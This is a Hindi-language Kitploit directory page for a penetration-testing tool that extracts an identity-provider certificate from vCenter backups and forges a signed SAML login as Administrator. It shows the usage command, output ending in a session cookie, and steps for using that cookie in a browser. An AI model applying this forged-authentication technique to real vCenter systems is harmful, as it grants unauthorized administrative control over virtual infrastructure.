Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
vcenter_saml_login — vCenter बैकअप से IdP प्रमाणपत्र निकालने और Administrator के रूप में लॉग इन करने का एक टूल | Kitploit
उपकरण/GitHubGitHub/horizon3ai/vcenter_saml_login
प्रमाणीकरण और प्राधिकरणक्लाउड इन्फ्रास्ट्रक्चर सुरक्षाविशेषाधिकार वृद्धिभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंग
GitHubhorizon3ai/vcenter_saml_login

vcenter_saml_login

vCenter बैकअप से IdP प्रमाणपत्र निकालने और Administrator के रूप में लॉग इन करने का एक टूल

रिपॉजिटरी देखें
52995733 साल पहलेKitploit द्वारा समीक्षित

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

vCenter SAML लॉगिन टूल

vCenter बैकअप से Identity Provider (IdP) प्रमाणपत्र निकालने और Administrator के रूप में लॉग इन करने के लिए एक टूल

पृष्ठभूमि

आम तौर पर, परीक्षणों के दौरान, हमें किसी फाइलसर्वर पर vCenter बैकअप तक पहुंच मिलती है या हाल के CVEs के माध्यम से VCSA होस्ट पर रूट एक्सेस मिलता है। vCenter vSphere UI में लॉग इन करने से हमें आसानी से अधिक सिस्टम, गोपनीय जानकारी तक पहुंच मिलती है, साथ ही ग्राहकों को इन निष्कर्षों का प्रभाव दिखाने में भी मदद मिलती है।

data.mdb फ़ाइल में प्रमाणपत्र होते हैं और यह vCenter बैकअप के साथ-साथ रूट अनुमतियों वाले VCSA होस्ट पर भी पाई जा सकती है। ये प्रमाणपत्र क्लियरटेक्स्ट (cleartext) में संग्रहीत होते हैं और किसी भी उपयोगकर्ता के लिए किसी भी SAML प्रमाणीकरण अनुरोध पर हस्ताक्षर करने के लिए उपयोग किए जा सकते हैं - जिसमें अंतर्निहित Administrator भी शामिल है।

यदि आप इस टूल के कई उपयोग मामलों और vCenter होस्ट्स तक प्रशासनिक पहुंच प्राप्त करने के लिए हमने इसका उपयोग कैसे किया, इसके बारे में अधिक जानना चाहते हैं, तो हमारी ब्लॉग पोस्ट देखें: https://www.horizon3.ai/compromising-vcenter-via-saml-certificates/

उपयोग

root@kitploit:~
root@kali:~/vcenter# python3 vcenter_saml_login.py -p data.mdb -t 10.0.100.200
[*] Successfully extracted the IdP certificate
[*] Successfully extracted trusted certificate 1
[*] Successfully extracted trusted certificate 2
[*] Obtaining hostname from vCenter SSL certificate
[*] Found hostname vcsa.olympus for 10.0.100.200
[*] Initiating SAML request with 10.0.100.200
[*] Generating SAML assertion
[*] Signing the SAML assertion
[*] Attempting to log into vCenter with the signed SAML request
[+] Successfuly obtained Administrator cookie for 10.0.100.200!
[+] Cookie: VSPHERE-UI-JSESSIONID=06D1630719B4DE33A4CE653458911640

उपरोक्त कुकी के साथ, VCSA इंस्टेंस को https://<VCSA>/ui पर विज़िट करें, कुकी को /ui पथ के अंतर्गत जोड़ें, और https://<VCSA>/ui को फिर से ब्राउज़ करें।

प्रदर्शन

अस्वीकरण

यह सॉफ़्टवेयर पूर्ण रूप से शैक्षणिक अनुसंधान और प्रभावी रक्षात्मक तकनीकों के विकास के उद्देश्य से बनाया गया है, और इसका उपयोग सिस्टम पर हमला करने के लिए अभिप्रेत नहीं है, सिवाय उन मामलों के जहां स्पष्ट रूप से अधिकृत किया गया हो। प्रोजेक्ट अनुरक्षक इस सॉफ़्टवेयर के दुरुपयोग के लिए ज़िम्मेदार या उत्तरदायी नहीं हैं। जिम्मेदारी से उपयोग करें।

टूल डाउनलोड करें